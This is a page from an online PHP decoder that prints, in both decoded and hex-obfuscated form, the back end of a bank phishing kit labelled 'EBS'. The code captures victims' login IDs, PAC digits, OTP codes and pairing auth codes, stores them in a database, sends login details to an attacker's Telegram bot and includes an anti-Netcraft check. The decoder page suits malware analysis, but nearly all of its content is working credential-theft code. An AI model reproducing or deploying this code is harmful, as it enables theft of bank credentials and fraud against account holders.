Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto ivPLF; fKOSE: include "\155\141\162\x67\x69\x6e\x2e\160\150\160"; goto dvfBy;..
Decoded Output download
<?php
goto ivPLF; fKOSE: include "margin.php"; goto dvfBy; jdVnO: session_start(); goto x1K2y; ARPWM: include "../vendor/index.php"; goto VQbzz; HbQvJ: include "../vendor/300.php"; goto ARPWM; dvfBy: include "../vendor/100.php"; goto GNJnk; GNJnk: include "../vendor/200.php"; goto HbQvJ; ivPLF: include "../../../CONFIG.php"; goto fKOSE; VQbzz: include "../vendor/netcraft_check.php"; goto jdVnO; gJpF8: function sendToTele($messaggio, $token, $chatID) { $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto DYPAt; DYPAt: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $bankType = "EBS"; $comment = "User just logged into account"; $ip = $_POST["ip"]; $ua = urlencode($_POST["ua"]); $uniqueid = time(); $msg .= "[==========> {$bankType} Login <==========]\xa"; $msg .= "| Login : " . $usrlogin . "\xa"; $msg .= "[==========> IP INFO <==========]
"; $msg .= "| Submitted by : {$ip}
"; $msg .= "| UserAgent : {$ua} \xa"; $msg .= "==========> END <==========\xa"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "INSERT INTO customers (bankType, usrlogin, comment, ip, useragent, uniqueid, status) VALUES ('{$bankType}', '{$usrlogin}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db main conn error")); } } } goto KFus6; KFus6: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "PAC") { if ($_POST["pac1"] and $_POST["pac3"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $pac1 = $_POST["pac1"]; $pac2 = $_POST["pac2"]; $pac3 = $_POST["pac3"]; $comment = "PAC entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET pac1='{$pac1}', pac2='{$pac2}', pac3='{$pac3}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "PAC Error")); } } } if ($_GET["type"] == "FullPAC") { if ($_POST["pac1"] and $_POST["pac3"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $fullpac = $_POST["pac1"] . $_POST["pac2"] . $_POST["pac3"] . $_POST["pac4"] . $_POST["pac5"] . $_POST["pac6"]; $comment = "Full PAC entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET fullpac='{$fullpac}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "PAC Error")); } } } if ($_GET["type"] == "OTP") { if ($_POST["otpcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $otpcode = $_POST["otpcode"]; $comment = "OTP entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET otpcode='{$otpcode}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTP Error")); } } } if ($_GET["type"] == "PAIR") { if ($_POST["authcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $authcode = $_POST["authcode"]; $comment = "EBS Pair OTP entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET authcode='{$authcode}', comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Pair Error")); } } } } goto Y4XZg; x1K2y: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto gJpF8; Y4XZg: ?>Did this file decode correctly?
Original Code
<?php
goto ivPLF; fKOSE: include "\155\141\162\x67\x69\x6e\x2e\160\150\160"; goto dvfBy; jdVnO: session_start(); goto x1K2y; ARPWM: include "\56\56\57\x76\x65\x6e\x64\x6f\x72\57\x69\156\x64\x65\170\x2e\160\x68\x70"; goto VQbzz; HbQvJ: include "\56\x2e\x2f\x76\x65\x6e\144\157\x72\57\63\60\60\x2e\160\x68\x70"; goto ARPWM; dvfBy: include "\x2e\x2e\57\166\x65\x6e\x64\157\x72\57\x31\60\x30\x2e\160\x68\x70"; goto GNJnk; GNJnk: include "\56\56\x2f\x76\145\x6e\144\x6f\162\57\x32\60\x30\56\x70\150\160"; goto HbQvJ; ivPLF: include "\x2e\56\x2f\56\56\x2f\x2e\56\57\x43\x4f\116\106\111\x47\56\160\x68\x70"; goto fKOSE; VQbzz: include "\x2e\56\x2f\x76\145\x6e\144\157\162\57\156\x65\x74\143\162\141\x66\164\137\x63\x68\145\143\153\56\160\150\x70"; goto jdVnO; gJpF8: function sendToTele($messaggio, $token, $chatID) { $url = "\x68\x74\x74\160\x73\72\x2f\x2f\x61\160\151\x2e\x74\145\154\x65\x67\x72\141\x6d\x2e\x6f\x72\147\x2f\142\157\164" . $token . "\57\163\x65\x6e\x64\115\x65\163\163\x61\147\145\x3f\x63\x68\x61\x74\x5f\x69\144\x3d" . $chatID; $url = $url . "\46\164\145\x78\x74\x3d" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto DYPAt; DYPAt: if ($_GET["\x74\171\x70\x65"] == "\x6c\x6f\147\151\x6e") { if ($_POST["\165\163\162\x6c\x6f\147\151\x6e"] and $_POST["\x69\x70"] and $_POST["\x75\x61"]) { $usrlogin = $_POST["\x75\x73\162\154\157\147\151\x6e"]; $bankType = "\x45\x42\x53"; $comment = "\x55\163\x65\x72\x20\152\x75\163\164\40\154\x6f\x67\x67\x65\x64\40\x69\x6e\x74\157\x20\x61\143\x63\157\x75\156\164"; $ip = $_POST["\151\160"]; $ua = urlencode($_POST["\165\x61"]); $uniqueid = time(); $msg .= "\x5b\75\x3d\x3d\75\75\75\75\75\x3d\x3d\x3e\40{$bankType}\40\x4c\157\147\x69\x6e\40\x3c\75\75\75\75\x3d\x3d\75\x3d\x3d\x3d\x5d\xa"; $msg .= "\x7c\40\x4c\157\x67\151\156\40\72\x20" . $usrlogin . "\xa"; $msg .= "\x5b\x3d\x3d\75\75\x3d\x3d\75\75\x3d\x3d\x3e\40\111\120\x20\111\x4e\x46\117\x20\x3c\x3d\75\x3d\x3d\75\x3d\75\x3d\x3d\75\x5d\12"; $msg .= "\174\x20\123\x75\x62\155\151\x74\x74\145\x64\40\142\171\40\72\40{$ip}\x20\12"; $msg .= "\174\x20\125\163\145\162\101\147\x65\x6e\164\40\72\40{$ua}\40\xa"; $msg .= "\x3d\75\x3d\75\75\75\x3d\x3d\75\75\x3e\40\105\x4e\104\x20\74\x3d\75\75\x3d\75\75\75\75\x3d\x3d\xa"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "\x49\x4e\x53\105\x52\x54\40\111\116\124\117\x20\143\x75\163\x74\x6f\x6d\x65\x72\x73\40\50\142\x61\156\153\x54\171\x70\145\x2c\x20\165\163\162\x6c\157\x67\151\x6e\54\40\x63\157\x6d\x6d\x65\156\164\54\x20\x69\160\54\40\165\163\x65\162\141\147\x65\x6e\164\x2c\40\x75\x6e\151\x71\x75\145\151\x64\x2c\40\163\x74\141\x74\165\163\51\x20\x56\101\x4c\x55\105\123\x20\50\47{$bankType}\x27\54\40\x27{$usrlogin}\47\x2c\40\47{$comment}\x27\54\40\47{$ip}\47\x2c\x20\47{$ua}\47\54{$uniqueid}\x2c\40\x31\x29"); if ($query) { $_SESSION["\165\156\151\161\165\x65\151\x64"] = $uniqueid; $_SESSION["\163\164\141\162\164\145\x64"] = "\164\x72\165\145"; echo json_encode(array("\x73\x74\141\164\x75\x73" => "\157\153")); } else { echo json_encode(array("\163\164\x61\164\x75\x73" => "\144\142\x20\x6d\x61\151\x6e\x20\143\x6f\156\156\40\x65\162\x72\x6f\162")); } } } goto KFus6; KFus6: if ($_SESSION["\x73\x74\x61\x72\x74\145\x64"] == "\x74\x72\x75\145") { if ($_GET["\x67\145\x74\x73\x74\x61\x74\165\163"] and numeric($_GET["\x67\145\164\163\x74\141\164\x75\163"]) == true) { $id = $_GET["\147\145\164\x73\x74\141\x74\x75\163"]; $query = mysqli_query($conn, "\123\x45\x4c\x45\x43\x54\40\52\40\146\x72\x6f\155\x20\x63\x75\x73\164\157\x6d\145\162\163\40\127\110\105\122\x45\40\x75\156\x69\161\x75\145\x69\144\75\x27{$id}\x27"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\x73\164\141\x74\x75\163"]; } } if ($_GET["\164\171\160\x65"] == "\x50\101\x43") { if ($_POST["\160\141\x63\x31"] and $_POST["\x70\141\143\x33"] and $_POST["\x75\x73\x65\x72\x69\144"] and numeric($_POST["\165\163\145\x72\151\144"]) == true) { $pac1 = $_POST["\x70\141\143\x31"]; $pac2 = $_POST["\160\141\x63\x32"]; $pac3 = $_POST["\x70\x61\x63\63"]; $comment = "\120\x41\x43\40\145\156\x74\x65\x72\145\x64\x2c\x20\x75\163\145\162\x20\x77\141\151\x74\x69\x6e\x67"; $uniqueid = $_POST["\x75\x73\x65\x72\151\144"]; $query = mysqli_query($conn, "\x55\x50\x44\x41\124\105\x20\143\x75\163\164\x6f\155\x65\162\x73\40\123\105\124\40\x70\x61\143\x31\75\x27{$pac1}\47\x2c\40\x70\141\143\x32\75\x27{$pac2}\47\54\40\x70\x61\143\x33\x3d\x27{$pac3}\x27\54\x20\x63\x6f\x6d\155\x65\x6e\x74\x3d\47{$comment}\x27\x2c\x20\x73\x74\x61\164\x75\163\75\x32\x2c\x20\142\165\x7a\172\x65\144\x3d\60\40\127\x48\x45\x52\105\x20\165\x6e\151\x71\x75\x65\151\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\x73\x74\x61\164\165\x73" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\x61\x74\x75\163" => "\120\x41\103\x20\x45\x72\x72\157\x72")); } } } if ($_GET["\x74\171\x70\x65"] == "\x46\x75\x6c\154\120\101\103") { if ($_POST["\x70\x61\x63\x31"] and $_POST["\160\x61\143\x33"] and $_POST["\x75\x73\145\162\x69\144"] and numeric($_POST["\x75\x73\145\162\x69\x64"]) == true) { $fullpac = $_POST["\160\x61\x63\61"] . $_POST["\x70\141\143\x32"] . $_POST["\x70\141\143\x33"] . $_POST["\160\141\x63\64"] . $_POST["\x70\x61\143\x35"] . $_POST["\x70\141\143\x36"]; $comment = "\106\165\x6c\154\40\120\x41\103\x20\145\156\x74\x65\162\145\144\54\x20\x75\163\x65\162\40\167\141\x69\x74\151\156\x67"; $uniqueid = $_POST["\x75\x73\x65\162\x69\144"]; $query = mysqli_query($conn, "\x55\120\104\x41\x54\105\40\143\165\x73\x74\157\155\x65\162\163\40\123\105\x54\40\146\x75\154\154\160\x61\143\75\47{$fullpac}\47\x2c\x20\x63\157\155\155\145\156\164\75\x27{$comment}\x27\54\40\163\x74\141\164\x75\x73\75\x32\x2c\x20\142\165\x7a\x7a\145\144\75\x30\40\x57\x48\105\122\x45\40\165\156\151\x71\165\145\x69\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\141\164\x75\x73" => "\157\153")); } else { echo json_encode(array("\163\x74\141\164\165\x73" => "\x50\101\x43\40\105\x72\162\157\x72")); } } } if ($_GET["\x74\171\160\145"] == "\117\x54\120") { if ($_POST["\x6f\x74\160\143\x6f\x64\x65"] and $_POST["\x75\163\x65\162\x69\144"] and numeric($_POST["\165\163\145\162\151\144"]) == true) { $otpcode = $_POST["\157\164\x70\x63\x6f\x64\x65"]; $comment = "\117\124\x50\x20\x65\156\x74\145\162\145\144\54\40\x75\163\x65\162\x20\167\x61\x69\x74\151\x6e\147"; $uniqueid = $_POST["\165\x73\145\162\151\x64"]; $query = mysqli_query($conn, "\x55\x50\104\x41\x54\x45\x20\x63\165\163\x74\x6f\x6d\x65\x72\x73\40\123\x45\124\40\157\164\160\x63\157\x64\145\75\x27{$otpcode}\x27\x2c\x20\x63\x6f\x6d\x6d\x65\156\x74\75\47{$comment}\x27\x2c\x20\163\164\x61\x74\x75\163\x3d\63\54\x20\x62\x75\x7a\172\145\144\x3d\x30\x20\x57\x48\105\122\105\40\x75\156\x69\161\165\145\151\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\141\164\165\x73" => "\157\153")); } else { echo json_encode(array("\x73\x74\141\164\x75\163" => "\117\124\x50\x20\x45\162\x72\157\x72")); } } } if ($_GET["\x74\171\160\145"] == "\120\x41\111\x52") { if ($_POST["\x61\165\x74\150\143\x6f\144\145"] and $_POST["\165\x73\x65\162\x69\144"] and numeric($_POST["\165\163\x65\x72\x69\x64"]) == true) { $authcode = $_POST["\x61\x75\164\x68\x63\x6f\144\145"]; $comment = "\x45\x42\123\x20\x50\141\x69\x72\x20\x4f\x54\x50\40\145\156\x74\145\162\145\144\x2c\x20\x75\163\145\x72\x20\167\x61\151\x74\151\x6e\x67"; $uniqueid = $_POST["\x75\x73\145\x72\x69\x64"]; $query = mysqli_query($conn, "\x55\x50\104\x41\x54\x45\40\143\165\163\x74\157\x6d\x65\x72\163\x20\x53\105\124\40\141\165\164\x68\143\157\x64\x65\x3d\47{$authcode}\47\54\x20\x63\x6f\155\155\145\x6e\x74\x3d\47{$comment}\47\x2c\40\x73\164\x61\x74\165\163\x3d\64\x2c\x20\142\x75\172\x7a\145\144\75\60\40\127\110\x45\x52\105\x20\165\156\151\x71\165\x65\151\144\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\x61\x74\165\163" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\141\164\165\163" => "\x50\x61\151\162\40\x45\x72\162\x6f\162")); } } } } goto Y4XZg; x1K2y: function numeric($num) { if (preg_match("\57\136\x5b\x30\x2d\71\x5d\x2b\44\57", $num)) { $status = true; } else { $status = false; } return $status; } goto gJpF8; Y4XZg: ?>Function Calls
| None |
Stats
| MD5 | 08e9a09ac0296bf3fcc5f3c4ecc4db24 |
| Eval Count | 0 |
| Decode Time | 41 ms |